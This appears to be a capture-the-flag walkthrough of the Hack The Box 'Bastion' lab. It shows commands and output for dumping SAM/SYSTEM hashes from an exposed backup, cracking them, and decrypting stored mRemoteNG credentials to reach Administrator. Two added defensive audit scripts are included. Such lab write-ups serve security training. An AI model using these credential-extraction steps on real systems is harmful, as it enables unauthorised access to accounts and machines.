Connect to the HTB server and start the target machine
Target IP: 10.10.10.134
Assigned IP: 10.10.16.13
Information gathering
Use rustscan to scan the target's TCP ports for open ports
rustscan -a 10.10.10.134 -r 1-65535 --ulimit 5000 | tee res
Extract and save the target's open TCP port numbers
ports=$(grep '^[0-9]' res | cut -d/ -f1 | paste -sd,)
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep '^[0-9]' res | cut -d/ -f1 | paste -sd,
22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep '^[0-9]' res | cut -d/ -f1 | paste -sd,)
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670
Use nmap to run script and service scans against the target's open TCP ports
nmap -sT -p$ports -sCV -Pn 10.10.10.134
- Services that deserve particular attention
22: SSH service
445: SMB service
5985: WinRM service
Use nmap to run vulnerability and OS detection scans against the target's open TCP ports
nmap -sT -p$ports --script=vuln -O -Pn 10.10.10.134
Use nmap to scan the target's commonly used UDP ports for open ports
nmap -sU --top-ports 20 -Pn 10.10.10.134
Use enum4linux to enumerate the target's SMB shares
enum4linux -u 'root' -S 10.10.10.134
- The enumeration results show that the target's Backups share allows access
Use smbclient to connect to the target's Backups share
smbclient -N \\\\10.10.10.134\\Backups
- A note file, note.txt, is visible in the share root
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# smbclient -N \\\\10.10.10.134\\Backups
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
5638911 blocks of size 4096. 1177893 blocks available
- Download it and exit the SMB connection for now
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
- View the note's contents
cat note.txt
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
- Under \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\ there are two .vhd files
In virtualization, .vhd (Virtual Hard Disk) is a virtual hard disk file format developed by Microsoft for storing a virtual machine's disk data; in environments such as Hyper-V it fully emulates a physical disk and holds the operating system, applications and user data.
Foothold
In the Windows Explorer address bar, enter \\10.10.10.134\Backups to access the share
Use 7z to open the larger of the two .vhd files
Try to locate the VM's SAM and SYSTEM files
- Default location of SAM and SYSTEM: C:\Windows\System32\config
Right-click each of the two files and copy them to the local machine
- Shortcut: right-click the file, then press F5
Use samdump2 to extract the password hashes from the SAM and SYSTEM hives
samdump2 SYSTEM SAM
- Extracted hashes
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
- Administrator and Guest are both shown as disabled, so only the L4mpje account's password needs to be cracked
Write the hash to a file for cracking
echo 'L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::' > hash
Use john to run a wordlist attack against the hash
john hash --wordlist=../dictionary/rockyou.txt --format=nt
Account: L4mpje
Password: bureaulampje
Log in to the target's SSH service with the above credentials
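The samdump2 output above is in pwdump format, and reading it correctly is the first thing a defender does after learning that a backup containing the SAM and SYSTEM hives was reachable over SMB. The following Python script is an added example and is not from the original writeup or from samdump2 itself: it parses the three lines shown above (embedded as a constructed sample), honours the *disabled* marker, recognises the two well-known sentinel hashes (the empty LM hash aad3b435... and the NT hash of the empty string 31d6cfe0...), and reports which enabled accounts actually have a real password hash exposed and therefore need rotating.

```python
"""Audit a pwdump-format listing (the format samdump2 prints) from a defender's side.

Added example, not code from the original writeup. Decides, for each account,
whether the leaked hive actually exposes a usable password hash.
"""
from __future__ import annotations

from dataclasses import dataclass

# Sentinel values every SAM audit should recognise.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string

# Constructed sample: the three lines samdump2 printed on this page.
SAMPLE = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""


@dataclass
class Account:
    name: str
    rid: int
    lm_hash: str
    nt_hash: str
    disabled: bool

    @property
    def lm_stored(self) -> bool:
        # A real LM hash means the password is trivially crackable offline.
        return self.lm_hash.lower() != EMPTY_LM

    @property
    def empty_password(self) -> bool:
        return self.nt_hash.lower() == EMPTY_NT


def parse_pwdump(text: str) -> list[Account]:
    """Parse 'name:rid:lmhash:nthash:::' lines; samdump2 prefixes disabled
    accounts with '*disabled*'."""
    accounts: list[Account] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        disabled = line.startswith("*disabled*")
        if disabled:
            line = line[len("*disabled*"):].strip()
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"not a pwdump line: {raw!r}")
        name, rid, lm_hash, nt_hash = fields[:4]
        accounts.append(Account(name, int(rid), lm_hash, nt_hash, disabled))
    return accounts


def accounts_to_rotate(accounts: list[Account]) -> list[str]:
    """Enabled accounts with a real NT hash: the credentials the leaked hive
    exposes, so the first passwords to rotate."""
    return [a.name for a in accounts if not a.disabled and not a.empty_password]


def findings(accounts: list[Account]) -> list[str]:
    """Hygiene problems beyond the leak itself."""
    out = []
    for a in accounts:
        if a.lm_stored:
            out.append(f"{a.name}: LM hash stored (crackable offline in minutes)")
        if not a.disabled and a.empty_password:
            out.append(f"{a.name}: enabled account with an empty password")
    return out


if __name__ == "__main__":
    parsed = parse_pwdump(SAMPLE)
    for acct in parsed:
        state = "disabled" if acct.disabled else "enabled"
        print(f"{acct.name:<14} rid={acct.rid:<5} {state:<8} empty_pw={acct.empty_password}")
    print("rotate first:", accounts_to_rotate(parsed))
    print("findings:", findings(parsed) or "none")
```

On the sample from this page the script reports a single account to rotate, L4mpje, and no further hygiene findings: the disabled built-in accounts carry the empty-string NT hash, and no LM hashes are stored. The same parser works on any pwdump-style dump, so it is also usable for checking that LM storage really is off across a fleet of hives.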
ssh L4mpje@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje
l4mpje@BASTION C:\Users\L4mpje>
- user.txt can be found in C:\Users\L4mpje\Desktop
l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\L4mpje\Desktop
22-02-2019 15:27 <DIR> .
22-02-2019 15:27 <DIR> ..
12-01-2025 08:10 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 4.824.010.752 bytes free
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
8e22e1e1e830fe4474ae632dc76a1e56
Privilege escalation
Use smbmap with the above credentials to enumerate the target's SMB shares again
smbmap -u L4mpje -p bureaulampje -H 10.10.10.134
- The output shows no difference from the shares enumerated at the start with the root account and an empty password
List the users on the target
net user
View the current user's information
net user L4mpje
- This user does not belong to any privileged group
View the current user's privileges
whoami /priv
- Switch to PowerShell
List the software installed on the target
ls "C:\Program Files (x86)"
- The output shows that mRemoteNG is installed; it is an open-source remote connection manager similar to tabby and windterm, so its saved connection history very likely holds the target administrator's credentials
Ask an LLM where this software stores users' sensitive information
Return to the current user's home directory
cd ~
List all files in the current directory
dir /a
- The output shows the AppData directory, so try going directly into %APPDATA%\mRemoteNG
cd %APPDATA%\mRemoteNG
- Clearly, the .xml files in this directory and their backups may well store user sensitive information
Ask the LLM again what confCons.xml is typically used to store
- It stores user credentials? Then that's the one
Convert the directory and file path with a Linux command
echo -E 'L4mpje@10.10.10.134:C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml' | tr '\\' '/'
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo -E 'L4mpje@10.10.10.134:C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml' | tr '\\' '/'
L4mpje@10.10.10.134:C:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml
Download confCons.xml to the local machine
scp L4mpje@10.10.10.134:C:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .
- View the file's contents
cat confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6"><Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" 
InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" /><Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" 
EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" 
InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>
- A quick look at the file gives the Administrator user's password hash
aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
- This doesn't look like any ciphertext I've seen
I tried searching GitHub for a hash-decryption tool for this software
After downloading it, I first looked at the script's usage
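confCons.xml is worth reading as a defender as well as an attacker: the root element records how the stored passwords are protected (EncryptionEngine, BlockCipherMode, KdfIterations, FullFileEncryption, Protected) and each Connection node records for which account and host a password is stored. The Python script below is an added example, not part of the original writeup or of mRemoteNG; it parses a constructed, trimmed copy of the file shown above (the long run of Inherit* and display attributes removed, the security-relevant attributes kept verbatim) and produces the findings an audit would raise. The 10000-iteration threshold is an assumption chosen for illustration, not a value mRemoteNG enforces.

```python
"""Inventory what an mRemoteNG confCons.xml stores and how it is protected.

Added example, not code from the original writeup or from the mRemoteNG project.
"""
from __future__ import annotations

import xml.etree.ElementTree as ET

# Constructed sample: the file shown on this page with the long run of Inherit*
# and display attributes dropped; the security-relevant attributes are verbatim.
SAMPLE_XML = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false"
    Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA"
    ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
        Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
        Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
  <Node Name="L4mpje-PC" Type="Connection" Username="L4mpje" Domain=""
        Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
        Hostname="192.168.1.75" Protocol="RDP" Port="3389" />
</mrng:Connections>
"""

# Assumed threshold for illustration; not a value mRemoteNG itself enforces.
MIN_KDF_ITERATIONS = 10000


def file_settings(root: ET.Element) -> dict:
    """File-level protection attributes from the <mrng:Connections> root."""
    return {
        "engine": root.get("EncryptionEngine"),
        "mode": root.get("BlockCipherMode"),
        "kdf_iterations": int(root.get("KdfIterations", "0")),
        "full_file_encryption": root.get("FullFileEncryption", "false").lower() == "true",
        "has_protected_check": bool(root.get("Protected")),
    }


def stored_credentials(root: ET.Element) -> list[dict]:
    """One record per Connection node: whose saved password it is and where it is used."""
    creds = []
    for node in root.iter("Node"):  # Node elements carry no namespace prefix
        if node.get("Type") != "Connection":
            continue
        creds.append({
            "name": node.get("Name"),
            "username": node.get("Username", ""),
            "domain": node.get("Domain", ""),
            "host": node.get("Hostname", ""),
            "protocol": node.get("Protocol", ""),
            "password_stored": bool(node.get("Password")),
        })
    return creds


def audit(xml_text: str, min_kdf_iterations: int = MIN_KDF_ITERATIONS):
    """Return (settings, credentials, issues) for a confCons.xml document."""
    root = ET.fromstring(xml_text)
    settings = file_settings(root)
    creds = stored_credentials(root)
    issues = []
    if not settings["full_file_encryption"]:
        issues.append("FullFileEncryption=false: hostnames, usernames and password "
                      "ciphertexts are readable by anyone who can open the file")
    if settings["kdf_iterations"] < min_kdf_iterations:
        issues.append(f"KdfIterations={settings['kdf_iterations']} is low, so guessing "
                      "the master password offline is cheap")
    for c in creds:
        if c["password_stored"]:
            who = f"{c['domain']}\\{c['username']}" if c["domain"] else c["username"]
            issues.append(f"node {c['name']!r} stores a password for {who}@{c['host']} ({c['protocol']})")
    return settings, creds, issues


if __name__ == "__main__":
    settings, creds, issues = audit(SAMPLE_XML)
    print("protection:", settings)
    for c in creds:
        print("stored credential:", c)
    for issue in issues:
        print("ISSUE:", issue)
```

The Password values are AES-GCM ciphertexts rather than hashes, keyed from the user's master password; mRemoteNG falls back to a built-in default master password when the user has never set one, which is why a readable copy of this file is effectively a plaintext credential store. Setting a custom master password, turning on FullFileEncryption, and keeping %APPDATA%\mRemoteNG out of backups that are reachable over an open share are the mitigations the audit output points at.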
python mremoteng_decrypt.py -h
- The output shows that the -s option takes the base64 ciphertext; try cracking the ciphertext with this tool
python mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='
Password: thXLHM96BeKL0ER2
- Administrator credentials obtained
Account: Administrator
Password: thXLHM96BeKL0ER2
Log in to the target's SSH service with these credentials
ssh Administrator@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator
- root.txt can be found in C:\Users\Administrator\Desktop